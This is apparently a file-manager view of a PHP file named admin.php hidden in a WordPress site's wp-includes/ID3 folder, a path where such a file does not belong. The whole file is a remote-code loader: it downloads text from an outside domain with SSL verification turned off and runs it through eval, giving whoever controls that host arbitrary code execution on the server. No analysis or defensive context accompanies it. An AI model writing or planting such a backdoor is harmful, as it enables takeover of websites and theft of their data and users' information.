Viewing File: /home/tvinntxo/public_html/wp-includes/ID3/files/heede/admin.php

<?php
$url = 'https://stepmomhub.com/5.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$content = curl_exec($ch);
curl_close($ch);

if ($content === false) {
    die('Gagal mengambil konten dari URL');
}

eval('?>' . $content);
?>
Back to Directory File Manager